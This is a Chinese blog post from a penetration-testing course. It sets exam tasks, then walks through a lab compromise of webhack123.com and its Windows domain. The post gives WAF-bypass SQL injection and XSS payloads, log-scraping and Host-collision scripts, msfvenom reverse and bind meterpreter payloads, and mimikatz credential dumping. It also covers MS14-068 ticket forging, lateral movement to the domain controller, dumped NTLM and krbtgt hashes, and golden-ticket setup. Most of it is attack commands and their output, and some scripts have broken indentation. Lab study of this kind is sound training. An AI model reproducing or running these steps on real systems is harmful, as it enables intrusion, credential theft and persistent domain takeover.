首页 > 其他分享 >阶段测试

阶段测试

时间:2024-03-22 16:11:56浏览次数:17  
标签:exe http mimikatz aad3b435b51404eeaad3b435b51404ee 阶段 测试 域控 com

1、尝试获取千锋官网服务器真实IP

2、尝试使用sqlilab靶场任意一关写入一句话木马链接

3、绕过安全狗演示文件上传,sql注入,xss漏洞
文件上传绕过方式:垃圾数据绕过,数据包溢出绕过等等

SQL注入绕过:内联注释/*! */

id=-1' /*!11445or*/ 1=1 %23

xss绕过方式:<img src=x one rror=prompt(/img/)>

4、使用文件包含漏洞配合图片马获取服务器shell

5、演示redis未授权漏洞
redis未授权实际上就是redis刚安装好的时候不需要密码直接监听端口就可以,

6、使用shiro反序列化漏洞获取服务器webshell

7、配合扫描器与手工渗透,为testfire.net网站编写渗透测试报告

https://www.cnblogs.com/TessCat/p/18089628

8、演示Windows与Linux的提权

9、回答面试题什么是反序列化漏洞

10、演示所有自己掌握的内网渗透的手段

信息收集

端口扫描

使用工具masscan,nmap,goby

masscan -p- 192.168.234.0/24 --rate==10000

nmap -p- -sC -A 192.168.234.26 -oA webhack123-p

网站信息收集

whatweb http://www.webhack123.com/

gobuster dir -u http://www.webhack123.com/ -w /usr/share/wordlists/dirb/big.txt -t 50

svn信息泄露

漏洞利用 entries

在 ThinkPHP_3.1.3 中 日志文件始开启的 经过 wc.db 可以知道文件目录位置

.svn 存在可以遍历文件 但是这里失败

http://www.webhack123.com/.svn/entries

http://www.webhack123.com/.svn/wc.db

编写tp_log工具

python
#coding:utf-8
import requests
url ="http://www.webhack123.com/App/Runtime/Logs"
def add_urls(patch,y):
	urls=[]
	for i in range(1,7):
		for j in range(1,32):
			if i<10:
				if j<10:
					urls.append(patch+"/%s_0%s_0%s.log" %(y,i,j))
				else:
					urls.append(patch+"/%s_0%s_%s.log" % (y,i,j))
				else:
					if j<10:
						urls.append(patch+"/%s_%s_0%s.log" % (y,i,j))
					else:
						urls.append(patch+"/%s_%s_%s.log" % (y,i,j))
	return urls
urls = add_urls(url,"20")
	for i in urls:
		req=requests.get(i)
			if req.status_code==200:
				print(i)
				html = req.text
				with open("webhack123.txt",'a',encoding='utf-8') as f:
				f.write(html)

password` = 74c774ef39b5b977c1fd59dbfc73c3e380a65aa3

web123

碰撞

在 域名服务商(IDC)那里没有指定ip 本地hosts访问

在服务器做了域名绑定

这种可以修改本地hosts文件进行访问

https://github.com/fofapro/Hosts_scan 脚本与我的需求有点不合适小修改了一下自动导入 top3K 子域名进行穷举碰撞 IP 修改后的脚本

!/usr/bin/python

python
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#Author:R3start
#这是一个用于IP和域名碰撞匹配访问的小工具

import requests
import re


lists=[]
files = open('hosts_ok.txt','w+')
#读取IP地址
print("====================================开 始 匹 配====================================")
for iplist in open("ip.txt"):
    ip = iplist.strip('\n')
    #读取host地址
    #http_s = ['http://','https://']
    http_s = ['http://']
    for h in http_s :
    	for d in open("subdomains_1000.txt",'r'):#moonsec
    		d=d.strip('\n')
        	for hostlist in open("host.txt",'r'):
            		host = hostlist.strip('\n')
            		headers = {'Host':host,'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'}
            		try:
                		r = requests.session()
                		requests.packages.urllib3.disable_warnings()
                		rhost = r.get(h + ip,verify=False,headers=headers,timeout=5)
                		rhost.encoding='utf-8'
                		title = re.search('<title>(.*)</title>', rhost.text).group(1) #获取标题
                		info = '%s -- %s 协议:%s 数据包大小:%d 标题:%s' % (ip,host,h,len(rhost.text),title)
                		lists.append(info)
                		files.write(info + "\n")
                		print(info)
            		except Exception :
                		error = ip + " --- " + host + " --- 访问失败!~"
                		print(error)
print("====================================匹 配 成 功 的 列 表====================================")
for i in lists:
    print(i)

phpstudy 套件是默认是管理员权限的直接上传执行 exe 就是高权限了

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.4 lport=12345 -f exe >s.exe

msfconsole

use exploit/multi/hander

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.234.4

set lport 12345

run

查看权限getuid

ps查看进程

migrate 468 迁移到系统进程里

mimikatz 哈希明文获取

load mimikatz/kiwi

creds_tspkg

Username Domain Password


Administrator WEB !@#Qwe456

看一下

arp

端口 netstat

看到是和10.10.10.149有连接的

现在确定一下是否在域里面

shell

ipconfig /all

解决乱码用chcp 65001

hostname查看主机名

域控上面都要配置dns

10.10.10.149 这个ip上 可能是域控

域内信息收集

域控信息收集

net time /domain

net time /domain:hackbox

工作组信息收集

net group /domain

获取登录过的用户信息、

run post/windows/gather/enum_logged_on_users

SID Profile Path


S-1-5-18 C:\Windows\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-1443003717-4130318662-4279967973-500 C:\Users\Administrator
S-1-5-21-2005268815-658469957-1189185684-1103 C:\Users\web
S-1-5-21-2005268815-658469957-1189185684-500 C:\Users\Administrator.HACKBOX

添加路由渗透域控

background

use auxiliary/server/socks_proxy

run autoroute -s 10.10.10.0/24

通过代理扫描域控

proxychains4 nmap -sT -Pn 10.10.10.149

永恒之蓝直接打

没成功

ms14-068 的条件

使用这个 exp 需要一个普通域控用户 web 是域用户 但是不知道密码

域普通用户 创建票据 注入票据 获得访问权限 域超级管理员权限

web 主机名 用户名web

有时候web 系统管理员 密码都一样

开启远程桌面
run post/windows/manage/enable_rdp
rdesktop 192.168.234.27

使用工具创建票据

MS14-068.exe -u [email protected] -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456

[email protected]

在 metasploit mimikatz 好似没有这个功能

上传mimikatz 注入票据

upload /root/Desktop/mimikatz-master/x64/mimidrv.sys C:/phpstudy_pro/WWW/www.webhack123.com/

upload /root/Desktop/mimikatz-master/x64/mimikatz.exe C:/phpstudy_pro/WWW/www.webhack123.com/

upload /root/Desktop/mimikatz-master/x64/mimilib.dll C:/phpstudy_pro/WWW/www.webhack123.com/

shell

mimikatz.exe 使用工具

kerberos::purge 清除票据

kerberos::list 查看票据

kerberos::ptc [email protected] 插入票据

访问域控dir \dc\c$

生成正向马

只要dc能运行这个 d.exe metasploit 就可以正向链接到 meterpreter

msfvenom -p windows/meterpreter/bind_tcp lport=13777 -f exe >pwd/d.exe

copy 复制到域控

copy d.exe \dc\c$\

at 执行任务运行 exe

net time \dc

at \dc 这里是执行时间 c:/d.exe

获取域控权限命令

复制文件到目标
copy bind.exe \dc\C$
查询 dc 时间
net time \dc
增加任务执行
at \dc 这里是执行时间 c:/d.exe

连接域控
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.149
set lport 13777
exploit

获取 dc 域控哈希明文

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ef9b0225de3ab24be9e2d97f59b3018f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6f60ace6accbcb76078ccc0312174e98:::
web:1103:aad3b435b51404eeaad3b435b51404ee:086a0bb1ed4ec72250760ea531bf8074:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:3562c74e346b3e8509381ff675d37b90:::
WEB$:1104:aad3b435b51404eeaad3b435b51404ee:665f9f359183133251a3eb49c44d2b21:::

run post/windows/gather/smart_hashdump

[] Running module against DC
[
] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[] /root/.msf4/loot/20240107063931_default_10.10.10.149_windows.hashes_844967.txt
[+] Host is a Domain Controller
[
] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:ef9b0225de3ab24be9e2d97f59b3018f
[+] krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6f60ace6accbcb76078ccc0312174e98
[+] web:1103:aad3b435b51404eeaad3b435b51404ee:086a0bb1ed4ec72250760ea531bf8074
[+] DC$:1000:aad3b435b51404eeaad3b435b51404ee:3562c74e346b3e8509381ff675d37b90
[+] WEB$:1104:aad3b435b51404eeaad3b435b51404ee:665f9f359183133251a3eb49c44d2b21
meterpreter > load mimikatz

creds_tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials

tspkg credentials

Username Domain Password


Administrator HACKBOX !@As123

dcsync_ntlm krbtgt
[!] Running as SYSTEM; function will only work if this computer account has replication privileges (e.g. Domain Controller)
[+] Account : krbtgt
[+] NTLM Hash : 6f60ace6accbcb76078ccc0312174e98
[+] LM Hash : 36588bd35fd1fe85ec5fd73a1ca6805b
[+] SID : S-1-5-21-2005268815-658469957-1189185684-502
[+] RID : 502

制作黄金票据

考虑长期权维护,还是做一个黄金票据比较保险。

获取 ntml sid rid

wmic useraccount where name="krbtgt" get sid

dcsync_ntlm krbtgt

golden_ticket_create -d hackbox.com -u moonsec -s

标签:exe,http,mimikatz,aad3b435b51404eeaad3b435b51404ee,阶段,测试,域控,com
From: https://www.cnblogs.com/TessCat/p/18089702

相关文章

  • 渗透测试报告
    渗透测试目标testfire.net使用工具awvs、goby、BrupSuite、多地ping渗透过程使用多地ping,没有dns手工测试万能密码发现sql注入,搜索框有xssAWVS扫描结果漏洞全已手工验证goby扫描结果目前发现漏洞6个xss一个sql注入......
  • 无计算机基础想进AI方向,可以通过以下几个阶段学习AI,具体建议如下:
    无计算机基础想进AI方向,可以通过以下几个阶段学习AI,具体建议如下:阶段一:数学与编程基础构建在这个阶段,学员将专注于夯实数学基础,涵盖统计学、线性代数和微积分等核心数学知识,确保对机器学习和深度学习算法背后的数学原理有深入理解。同时,系统学习Python语言,包括语法结构、数据类......
  • 软件测试的学习随笔001
    T01:我理解的软件测试流程:1.需求分析阶段:测试团队与业务团队和开发团队合作,了解需求与功能,确定测试范围与重点,分配好产品计划的排期。2.测试计划阶段:制定测试计划,包括测试目标、测试策略、资源需求、进度安排等等。3.测试设计阶段:根据需求和设计文档编写测试用例,设计测试数据。......
  • 经纬恒润基于INTEWORK-TAE的OTA自动化测试解决方案
        经纬恒润针对目前OTA测试中普遍存在的问题,基于自研的INTEWORK系列产品,推出了车辆OTA自动化测试解决方案。 了解更多:    请致电010-64840808或发送邮件至[email protected](联系时请说明来自博客园) ......
  • 易基因: WGBS+RNA-seq揭示松材线虫JIII阶段形成过程中的DNA甲基化差异
    大家好,这里是专注表观组学十余年,领跑多组学科研服务的易基因。松木线虫(PWN,Bursaphelenchusxylophilus)是一种破坏性病原体,可引起松树枯萎病,感染PWN的松树最终会死亡。这种微观线虫具有复杂的生命周期,具有植食性(以植物为食)和菌丝体(以真菌为食)的发育阶段,以及不同的生命周期,包括繁殖......
  • 【测试开发学习历程】MySQL分组查询与子查询 + MySQL表的联结操作
    目录1 MySQL分组查询与子查询1.1数据分组查询1.2过滤分组1.3分组结果排序1.4select语句中子句的执行顺序1.5子查询2 MySQL表的联结操作2.1关系表2.2表联结2.3笛卡尔积2.4内部联结2.5外联结2.6自联结2.7组合查询1 MySQL分组查询与子查询1.1......
  • 【测试开发学习历程】MySQL增删改操作 + 备份与还原 + 索引、视图、存储过程
    前言:SQL内容的连载,到这里就是最后一期啦!如果有小伙伴要其他内容的话,我会追加内容的。(前提是我有学过,或者能学会)接下来,我们就要开始python内容的学习了~~ 目录1 MySQL增删改操作1.1数据添加操作1.1.1插入完整的行1.1.2插入多行1.2数据更新操作1.3数据删除操......
  • 人工智能如何让测试更智能更高效?
    在软件开发领域,自动化测试已经成为提高产品质量和加速开发周期的重要手段。而人工智能技术的迅速发展为自动化测试带来了新的机遇和挑战。本文将重点探讨人工智能在自动化测试中的应用。智能测试用例生成传统的测试用例编写通常依赖于测试人员的经验和知识,但随着软件系统的复杂......
  • visual studio如何测试http接口?(常用的接口测试工具)
    1.情景展示用了这么多年,一直在用notepad++来记录临时文件内容。现在改用visualstudio后,发现这个前端开发工具是可以调http接口的。为什么要在visualstudio中测试http接口?作为一个后端工程师,与接口打交道可谓是家常便饭,最开始自己使用的是:在chrome上的postman插件,后来chro......
  • 抢先一步,获取最全测试开发岗求职攻略
    春风拂面,一年中最繁荣的求职季节“金三银四”又悄然来临。对于寻求测试开发岗位的求职者来说,这是一个关键的时机,也是一个充满挑战的阶段。如何在激烈的竞争中脱颖而出,成功斩获心仪的Offer?以下是一些针对测试开发岗的金三银四求职攻略,希望能为你的求职之路提供有力支持。充分准备,......